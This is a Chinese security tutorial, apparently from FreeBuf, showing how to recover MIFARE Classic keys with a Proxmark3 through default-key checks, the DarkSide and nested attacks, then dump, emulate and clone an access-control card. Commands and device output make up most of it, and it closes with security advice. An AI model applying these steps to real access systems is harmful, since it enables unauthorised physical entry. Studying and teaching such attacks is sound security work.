RFID Hacking④:使用ProxMark3 破解门禁

文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用!

0×00 前言

国际黑客大会Defcon传统之一:开锁!因为黑客认为锁也是一种安全挑战。我们在黑客题材电影、电视剧中也常常看到:男主女主利用高超的黑客技能侵入目标公司的网络,甚至利用社会工程学突破门禁防护潜入对方办公地点进行物理攻击,如入无人之境。(神盾局、黑客军团、Who am i 貌似都有类似情节)

北上广不相信眼泪 16集

在这一背景下,我们不经思考:门禁系统作为企业物理第一道屏障,这些硬件基础设施安全是否一直都被忽视?

0×01 准备工作

Linux、Windows环境搭建可参考:RFID Hacking②:PM3入门指南 一文。

1.1 进入PM3工作终端

./proxmark3 /dev/ttyACM0

1.2 测试天线

proxmark3> hw tune

# LF antenna: 29.98 V @   125.00 kHz
# LF antenna: 30.39 V @   134.00 kHz
# LF optimal: 36.30 V @   129.03 kHz
# HF antenna: 27.90 V @    13.56 MHz
proxmark3>

1.3 设备固件

proxmark3> hw ver
#db# Prox/RFID mark3 RFID instrument
#db# bootrom: /-suspect 2015-04-02 15:12:04
#db# os: /-suspect 2015-04-02 15:12:11
#db# HF FPGA image built on 2015/03/09 at 08:41:42

0×02 爆破&枚举秘钥

2.1 读取卡片

proxmark3> hf 14a reader
ATQA : 04 00
 UID : 2c f0 55 0b
 SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443a-4 card found, RATS not supported

2.2 执行NESTED攻击,枚举&爆破key:

proxmark3> hf mf chk *1 ? t
No key specified,try default keys
chk default key[0] ffffffffffff
chk default key[1] 000000000000
chk default key[2] a0a1a2a3a4a5
chk default key[3] b0b1b2b3b4b5
chk default key[4] aabbccddeeff
chk default key[5] 4d3a99c351dd
chk default key[6] 1a982c7e459a
chk default key[7] d3f7d3f7d3f7
chk default key[8] 714c5c886e97
chk default key[9] 587ee5f9350f
chk default key[10] a0478cc39091
chk default key[11] 533cb6c723f6
chk default key[12] 8fd0a4f256e9
--SectorsCnt:0 block no:0x03 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:1 block no:0x07 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:2 block no:0x0b key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:3 block no:0x0f key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:4 block no:0x13 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:5 block no:0x17 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:6 block no:0x1b key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:7 block no:0x1f key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:8 block no:0x23 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:9 block no:0x27 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:10 block no:0x2b key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:11 block no:0x2f key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:12 block no:0x33 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:13 block no:0x37 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:14 block no:0x3b key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:15 block no:0x3f key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:0 block no:0x03 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:1 block no:0x07 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:2 block no:0x0b key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:3 block no:0x0f key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:4 block no:0x13 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:5 block no:0x17 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:6 block no:0x1b key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:7 block no:0x1f key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:8 block no:0x23 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:9 block no:0x27 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:10 block no:0x2b key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:11 block no:0x2f key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:12 block no:0x33 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:13 block no:0x37 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:14 block no:0x3b key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:15 block no:0x3f key type:B key count:13
Found valid key:[ffffffffffff]
proxmark3>

成功获得卡片key。

2.3 利用PRNG漏洞,执行mifare “DarkSide”攻击

proxmark3> hf mf mifare
-------------------------------------------------------------------------
Executing command. Expected execution time: 25sec on average  :-)

Press the key on the proxmark3 device to abort both proxmark3 and client.
-------------------------------------------------------------------------

uid(2cf0550b) nt(218e1cd8) par(0000000000000000) ks(090a070d060b0501) nr(00000000)

|diff|{nr}    |ks3|ks3^5|parity         |
+----+--------+---+-----+---------------+
| 00 |00000000| 9 |  c  |0,0,0,0,0,0,0,0|
| 20 |00000020| a |  f  |0,0,0,0,0,0,0,0|
| 40 |00000040| 7 |  2  |0,0,0,0,0,0,0,0|
| 60 |00000060| d |  8  |0,0,0,0,0,0,0,0|
| 80 |00000080| 6 |  3  |0,0,0,0,0,0,0,0|
| a0 |000000a0| b |  e  |0,0,0,0,0,0,0,0|
| c0 |000000c0| 5 |  0  |0,0,0,0,0,0,0,0|
| e0 |000000e0| 1 |  4  |0,0,0,0,0,0,0,0|
parity is all zero,try special attack!just wait for few more seconds...
key_count:0
Key not found (lfsr_common_prefix list is null). Nt=218e1cd8
Failing is expected to happen in 25% of all cases. Trying again with a different reader nonce...          

uid(2cf0550b) nt(218e1cd8) par(0000000000000000) ks(0d0407030d070c04) nr(00000001)

|diff|{nr}    |ks3|ks3^5|parity         |
+----+--------+---+-----+---------------+
| 00 |00000001| d |  8  |0,0,0,0,0,0,0,0|
| 20 |00000021| 4 |  1  |0,0,0,0,0,0,0,0|
| 40 |00000041| 7 |  2  |0,0,0,0,0,0,0,0|
| 60 |00000061| 3 |  6  |0,0,0,0,0,0,0,0|
| 80 |00000081| d |  8  |0,0,0,0,0,0,0,0|
| a0 |000000a1| 7 |  2  |0,0,0,0,0,0,0,0|
| c0 |000000c1| c |  9  |0,0,0,0,0,0,0,0|
| e0 |000000e1| 4 |  1  |0,0,0,0,0,0,0,0|
parity is all zero,try special attack!just wait for few more seconds...
key_count:0
Key not found (lfsr_common_prefix list is null). Nt=218e1cd8
Failing is expected to happen in 25% of all cases. Trying again with a different reader nonce...          

uid(2cf0550b) nt(218e1cd8) par(0000000000000000) ks(0d040e0e0c010e00) nr(00000002)

|diff|{nr}    |ks3|ks3^5|parity         |
+----+--------+---+-----+---------------+
| 00 |00000002| d |  8  |0,0,0,0,0,0,0,0|
| 20 |00000022| 4 |  1  |0,0,0,0,0,0,0,0|
| 40 |00000042| e |  b  |0,0,0,0,0,0,0,0|
| 60 |00000062| e |  b  |0,0,0,0,0,0,0,0|
| 80 |00000082| c |  9  |0,0,0,0,0,0,0,0|
| a0 |000000a2| 1 |  4  |0,0,0,0,0,0,0,0|
| c0 |000000c2| e |  b  |0,0,0,0,0,0,0,0|
| e0 |000000e2| 0 |  5  |0,0,0,0,0,0,0,0|
parity is all zero,try special attack!just wait for few more seconds...
p1:0 p2:0 p3:0 key:ffffffffffff
p1:29e5f p2:18a2b p3:1 key:b8b2a3c07af9
p1:2ba97 p2:19a40 p3:2 key:b5ba0002b5ea
p1:2c3fd p2:19fb9 p3:3 key:b4b979ba49de
p1:3de0e p2:24775 p3:4 key:968a7a09c714
p1:3fdf4 p2:25a7a p3:5 key:931b36c268ed
p1:54f81 p2:32426 p3:6 key:6ecaf371a99d
p1:58b75 p2:34777 p3:7 key:6860b744915b
p1:616dd p2:3998a p3:8 key:59747d7fdf41
p1:63400 p2:3ab54 p3:9 key:56476bbef406
p1:64ae0 p2:3b844 p3:a key:53dc6ee57a91
p1:6dc19 p2:40e78 p3:b key:44554ae362a1
p1:708f8 p2:42956 p3:c key:3f83eb143dd6
p1:7abf0 p2:48987 p3:d key:2e2b8565f96b
p1:7b298 p2:48d82 p3:e key:2d70e3e38553
p1:8420b p2:4e219 p3:f key:1e238b63e204
p1:8ce60 p2:53484 p3:10 key:0f4b7cb380a5
key_count:17
------------------------------------------------------------------
Key found:ffffffffffff 

Found valid key:ffffffffffff
proxmark3>

通过这一方式,同样可以获得卡片的key,不过很多时候还是要靠运气,因为不是所有的卡片都存在这种漏洞。如果不存在PRNG漏洞,我们则需要通过嗅探卡片和读卡器之间通信的数据包解出卡片的Key。

使用PM3进行中间人攻击嗅探通信数据包的方法可参考:RFID Hacking③:使用ProxMark3嗅探银行闪付卡信息,以及RadioWar团队的 利用Proxmark3监听M1卡交互过程,算出某一区的key

0×03 dump卡片数据&数据处理

使用上述方法,我们成功获得卡片key,接下来我们便可以使用key导出卡片中的所有数据(dumpdata)

proxmark3> hf mf nested 1 0 A ffffffffffff d
--block no:00 key type:00 key:ff ff ff ff ff ff  etrans:0
Block shift=0
Testing known keys. Sector count=16
nested...
Time in nested: 0.030 (inf sec per key)

-----------------------------------------------
Iterations count: 0

|---|----------------|---|----------------|---|
|sec|key A           |res|key B           |res|
|---|----------------|---|----------------|---|
|000|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|001|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|002|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|003|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|004|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|005|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|006|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|007|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|008|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|009|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|010|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|011|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|012|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|013|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|014|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|015|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|---|----------------|---|----------------|---|
Printing keys to bynary file dumpkeys.bin...
proxmark3>

在这一过程中,在PM3当前工作目录下生成了dumpkey.bin文件:

接下来我们执行hf mf dump便能获得整张卡片的数据:

proxmark3> hf mf dump
|-----------------------------------------|
|------ Reading sector access bits...-----|
|-----------------------------------------|
Command execute timeout
Sending bytes to proxmark failed
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
|-----------------------------------------|
|----- Dumping all blocks to file... -----|
|-----------------------------------------|
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
proxmark3>

此时,卡片数据已经被导出到PM3主目录下的dumpdata.bin这个二进制文件中:

但是PM3并不能识别、使用二进制文件,我们还需要使用脚本将这一个二进制文件转换成eml格式的文本信息:

proxmark3> script run dumptoemul.lua
--- Executing: ./scripts/dumptoemul.lua, args''
Wrote an emulator-dump to the file 2CF0550B.eml

-----Finished
proxmark3>

dumptoemul脚本成功将dumpdata.bin二进制文件转换成以卡片ID值命名的eml格式文件:

我们来对比一下这两个文件:

效果已经很明显了,脚本已经将乱码的二进制文件转换成了txt文本信息。

dumptoemul.lua脚本的功能也可以用Python语言来实现:bin2txet.py

#!/usr/bin/python
from __future__ import with_statement
import sys
import binascii

READ_BLOCKSIZE = 16

def main(argv):
    argc = len(argv)
    if argc < 3:
        print 'Usage:', argv[0], 'dumpdata.bin output.txt'
        sys.exit(1)

    with file(argv[1], "rb") as file_inp, file(argv[2], "w") as file_out:
        while True:
            byte_s = file_inp.read(READ_BLOCKSIZE)
            if not byte_s:
                break
            hex_char_repr = binascii.hexlify(byte_s)
            file_out.write(hex_char_repr)
            file_out.write("\n")

if __name__ == '__main__':
    main(sys.argv)

python bin2text.py dumpdata.bin output.txt
mv output.txt 2CF0550B.eml

清除仿真内存的各区块数据:

hf mf eclr

把从卡片中导出的数据加载到PM3设备中:

proxmark3> hf mf eload 2CF0550B
Loaded 64 blocks from file: 2CF0550B.eml

使用PM3模拟门禁卡:

proxmark3> hf mf sim
 uid:N/A, numreads:0, flags:0 (0x00)
#db# 4B UID: 2CF0550B
proxmark3>

这时我们可以使用PM3来实现通过门禁。另外一种方式:把从卡片导出的数据从PM3设备内存中克隆到白卡里,使用克隆卡片通过门禁v

proxmark3> hf mf cload e
Cant get block: 1

bingo

0×04 安全建议

目前我国80%的门禁产品均是采用原始IC卡的UID号或ID卡的ID号去做门禁卡,没有去进行加密认证或开发专用的密钥,其安全隐患远比Mifare卡的破解更危险,非法破解的人士只需采用专业的技术手段就可以完成破解过程。

门禁厂商、管理员:做好防护工作加强安全意识,尽量避免使用默认key、安全性低的key;对卡片和门禁读卡器使用身份认证&验证机制,绝对不能直接使用原始IC卡的UID号或ID卡的ID号去做门禁卡!

用户:妥善保管自己的门禁卡,避免信息泄露。

物联网IOT的高速发展,无线通信技术的应用也日趋广泛。本文仅通过门禁系统案例揭露NFC、RFID相关协议&技术存在的一些安全隐患。

我们现实生活中也有真实存在的案例:2010年北京一卡通被爆存在漏洞,可随意修改卡内余额,个人猜测这里很有可能是通过利用mifare卡片的PRNG漏洞来实现的。2014年,国外安全研究员发现台湾铁路、公交系统的悠游卡(EasyCard)同样存在PRNG漏洞,可修改卡片余额,并向悠游卡公司反馈报告了这一漏洞:

0×05 系列文章

RFID Hacking①:突破门禁潜入FreeBuf大本营

RFID Hacking②:PM3入门指南

RFID Hacking③:使用ProxMark3嗅探银行闪付卡信息

0×06 Refer

Mifare Classic 1k – cracker les clefs et lire le tag avec Proxmark3

offensive-security.com : Cloning RFID Tags with Proxmark 3

RadioWar : Proxmark3使用案例

DefCon 23 HOW TO TRAIN YOUR RFID HACKING TOOLS

backtrack-linux.org : RFID Cooking with Mifare Classic

BlackHat 2013 USA RFID Hacking Live Free or RFID Hard 

原文地址:http://www.freebuf.com/articles/wireless/109151.html

时间: 2024-07-31 01:00:50

RFID Hacking④:使用ProxMark3 破解门禁的相关文章

除了WiFi 泄密、破解门禁卡,无线电攻击居然还能用来打飞机 | 补天白帽大会 2017

  提到"无形之刃"这个词,许多人会想起武侠小说中"六脉神剑"那样的绝学,或是科幻电影里对超能力.念力的场景.然而在几天前的补天白帽大会上,杨卿的一场议题演讲却让人们意识到,无形之刃并不只是存在于电影之中,它就存在于我们身边--无线电攻击. 第一把无形之刃:WiFi WiFi 钓鱼这几年一说再说,已是老生常谈的内容,不过这一次360的无线电安全专家杨卿讲了些不一样的内容. 你的WiFi暴露你的踪迹 在现场,杨卿给大家讲了个老段子:"一个女生拿着男朋友的手机

超高频RFID技术在安防门禁应用上潜力巨大

射频识别技术最早应用于航空领域,追踪飞机资产.随着技术的发展,感应卡技术.高频智能卡技术及超高频技术逐渐进入安全管理领域,作为企业或机构的安全管理系统,保障安全,并提高运营效率和解决成本.尤其在安全身份验证领域,其技术被广泛应用于门禁管理.电脑安全登录.物流等领域. 射频卡分类 按载波频率分为低频射频卡.中频射频卡和高频射频卡.低频射频卡主要有125kHz和135kHz两种,中频射频卡频率主要为13.56MHz,高频射频卡 主要为433MHz.915MHz.2.45GHz.5.8GHz等.低频系

RFID Hacking②:PM3入门指南

0×00 前言 Proxmark3是由Jonathan Westhues在做硕士论文中研究Mifare Classic时设计.开发的一款开源硬件,可以用于RFID中嗅探.读取以及克隆等相关操作,如:PM3可以在水卡.公交卡.门禁卡等一系列RFID\NFC卡片和与其相对应的机器读取.数据交换的时候进行嗅探攻击,并利用嗅探到的数据通过XOR校验工具把扇区的密钥计算出来,当然PM3也能用于破解门禁实施物理入侵. 0×01 环境搭建 1.1 windows环境 PM3的固件和软件通常是配套使用,也就是说

门禁市场在安防网络化趋势下需开放融合

随着网络化的高度发展,物联网的崛起,各行各业都依托网络化的力量得到高速的发展,新技术得到广泛的传播和普及.安防行业做为网络化发展的排头兵,网络应用已经融入整个行业. 门禁市场在安防网络化趋势下需开放融合 视频监控在网络技术的推动下,有了蓬勃的发展,随着行业标准的不断完善和统一.导致视频监控领域,在单纯产品之间的竞争越来越激烈,让视频监控生产和制造商,将提升视频数据的价值和管理效益放在相当重要的位置. 而相对于视频监控的安防属性而言,门禁控制的主动安防特性,使门禁控制领域往往紧密围绕着客户的实际需

RFID Hacking①:突破门禁潜入FreeBuf大本营

某天,偶然间拿到了FreeBuf Pnig0s同学的工卡信息,终于有机会去做一些羞羞的事情了 引子 以下故事纯属虚构,如有雷同,纯属巧合. 我应聘了一个大型IT公司的"网络攻击研究部经理" 职务,面试官问我: 你觉得自己为什么适合这份工作? 我:我黑进你们的系统,给我自己发了面试通知. 很经典的一个视频: 最后上个真实的案例:线上的网络安全 VS 线下的物理安全 前几天媒体曝出:Dr.Web因揭露ATM木马遭报复,实验室两次遭燃烧弹攻击 @网路游侠 戏称:你线上查杀我的木马,我线下烧你

利用Teensy进行em410x卡模拟以及暴力破解em410x类门禁系统

什么是低频?什么是EM410x? 首先,我不得不再次提一下那些工作在125khz频率下的低频卡(如:EM410X之类的),以便大家更好的阅读以下的内容. 什么是低频?以下就是低频的解释: 低频(LF, Low frequency)是指频带由30KHz到300KHz的无线电电波.一些无线电频率识别( RFID技术 )标签使用低频. 这些标签通常被称为 LFID's或LowFID's(低频率识别Low Frequency Identification). 然而LFID's/LowFID's所常用(非

传统和互联网门禁系统的创新应用和价值探讨

门禁系统作为安防领域的一大子系统,其主要的职能是管理人员和车辆进出的出入口控制系统, 常见的门禁系统有:密码门禁系统.非接触卡门禁系统.生物识别门禁系统等,近年来,随着互联网技术的广泛渗透以及用户使用习惯的改变,以手机门禁.移动门禁为主的第四代门禁系统也悄然到来.伴随着产品形态的演变,传统和互联网门禁系统在应用模式和潜在价值方面又将产生哪些变化,本文将围绕相关主题作进一步探讨! 传统安防门禁系统的创新应用模式 随着近几年的迅速发展,门禁系统在功能设置上也逐渐跳出单一的出入口控制环节,朝综合的安全

设计一个门禁系统

问题描述 最近单位要搞一个门禁系统,我不知道国内哪个公司在这个方面厉害,谁帮帮我小弟我感激涕零! 解决方案 解决方案二:http://www.yoyon.net/public.asp?id=12&fileId=2&listId=12&lan=&Pid=39耀阳门禁管理系统解决方案三:十大门禁识别系统品牌(排名不分先后)十大门禁识别系统品牌:DDS中国有限公司DDS中国有限公司是一家专业从事门禁系统的机构,同时兼顾智能巡更.报警管理及相关安防业务,集系统设计.产品开发.销售和

利用nexus5伪造一张门禁卡

0×00 前言 我租住的杭州一个老小区一年前出现了所谓的"出租房杀人事件",事件过后民警叔叔们给小区的每个单元都装上了门禁,所有住户都需要在物业处登记,物业的工作人员会让你提供身份证或者公交卡用来注册,注册之后就可以刷卡进门了. 但由于某些原因,我并不想去登记注册一张门禁卡,正好手头有一部nexus5,众所周知nexus5是有nfc功能的,我便想能不能用nexus5的nfc功能伪造一张门禁卡呢? 一番尝试之后,就有了下文的方法. (从来没接触过无线安全,对Proxmark3,acr12